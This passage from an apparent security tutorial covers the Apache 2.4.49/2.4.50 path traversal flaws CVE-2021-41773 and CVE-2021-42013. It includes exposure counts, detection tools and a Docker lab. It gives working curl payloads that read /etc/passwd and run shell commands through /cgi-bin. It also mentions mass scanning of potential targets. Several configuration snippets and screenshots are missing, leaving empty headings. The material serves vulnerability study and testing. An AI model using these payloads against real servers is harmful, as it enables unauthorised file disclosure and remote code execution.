If the response code for any of the above endpoints is 403 then the target application can be vulnerable, but it should be kept in mind that 403 does not mean that the application is certainly vulnerable as WAF can also produce a 403 response code.
On the other hand, if the response code for any of the above endpoints is 400 or 5XX then the application will be most likely not vulnerable to this misconfiguration.
Another important thing to be kept in mind while testing for this vulnerability is that the vulnerability might exist even if the application does not have the “/cgi-bin/” in its directory structure as the vulnerability can be reproduced using other available aliases (e.g. /icons/).
The application must fulfil the following requirements for Path Traversal vulnerability:
CVE-2021-41773:
CVE-2021-42013:
Apache has been one of the first choices that many organizations think about for hosting their applications on the internet. According to the Netcraft’s Web Server Survey, nearly 25% of the developers prefer Apache for hosting their work over the internet. This enormous presence of Apache servers over the internet makes Apache one of the prime targets for security researchers and malicious actors.
As discussed in the earlier section, all these instances are not vulnerable as there are some minimum requirements. However, at present, the number of instances running Apache 2.4.49 are enormous and thus are being scanned at a very large scale by security researchers and bug hunters.
According to Censys.io at the time of writing this blog post, there are more than 18,000 active instances of Apache 2.4.49 that are a possible target for CVE-2021-41773 and more than 9,000 active instances of Apache 2.4.50 that can be tested for CVE-2021-42013:
Performing a similar search using the shodan.io vulnerability search engine yields more than 69,000 potential targets for CVE-2021-41773 and 13,500 possible targets for CVE-2021-42013 at the time of writing this post:
Shodan – Apache 2.4.49
Shodan – Apache 2.4.50
There are several ways for detection and exploitation of this vulnerability some of which are as follows:
A Nmap script can be found at GitHub that can be used for detection of this vulnerability using the following Nmap command:
$ nmap --script http-vuln-cve2021-41773 -p
A specially crafted curl command can also be used for checking whether a single target application is vulnerable to CVE-2021-41773 and CVE-2021-42013:
$ curl --silent --path-as-is --insecure "https://vulnerable.target/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/etc/passwd"
$ curl --silent --path-as-is --insecure "https://vulnerable.target/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd"
Nuclei vulnerability scanning templates are also available at GitHub Nuclei Template – CVE-2021-41773 and GitHub Nuclei Template – CVE-2021-42013 for identification and exploitation of CVE-2021-41773 and CVE-2021-42013 respectively. The nuclei templates can be used for scanning single target and mass scanning potential targets:
OWASP Nettacker is also effective in the identification of CVE-2021-41773 and CVE-2021-42013. It can be used for scanning the targets from a list, entire subnets, domains along with subdomains and IP ranges by running the following commands mentioned in the below screenshot:
Vulnerability Detection using “nettacker.py” Script
Misconfiguration of “apache2.conf” file can also lead to Remote Code Execution. If the configuration file “/etc/apache2/apache2.conf” has the configuration “Require all granted” instead of “Require all denied” and CGI scripts are also enabled for these aliased pathes, it could allow an attacker to exploit Path Traversal vulnerability and perform Remote Code Execution. The code snippets for vulnerable and safe configurations are mentioned below:
Vulnerable Configuration:
Safe Configuration:
This can be achieved using the following command:
$ curl -s --path-as-is -d 'echo Content-Type: text/plain; echo; id' "http://[IP]:[Port]/cgi-bin/.%2e/%2e%2e/%2e%2e/bin/sh"
For setting up the lab and practical demonstration, we will be using a Debian-based container image that is available on GitHub. This image can be used for testing and chaining the vulnerability from Path Traversal to Remote Code Execution.
Execute the following commands using any *.nix based system:
$ git clone https://github.com/blasty/CVE-2021-41773
$ docker-compose build && docker-compose up || docker-compose-up
Setting Up with Docker
Please note down the IP address and use that to perform Path Traversal and Remote Code Execution vulnerabilities.
Performing The Path Traversal Vulnerability:
$ curl -s --path-as-is "http://[IP]:[Port]/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"
Exploiting File Path Traversal Vulnerability
Escalating The Path Traversal Vulnerability To Remote Code Execution:
For escalating the vulnerability to Remote Code execution use the following curl command:
$ curl -s --path-as-is -d 'echo Content-Type: text/plain; echo; id' "http://[IP]:[Port]/cgi-bin/.%2e/%2e%2e/%2e%2e/bin/sh"
Exploiting Remote Code Execution Vulnerability
As highlighted in aforementioned screenshot, Remote Code Execution was not allowed on “/icons/” directory, it is required to use “/cgi-bin/”.
At the time of writing, this post one can follow the following techniques for safeguarding oneself from this vulnerability: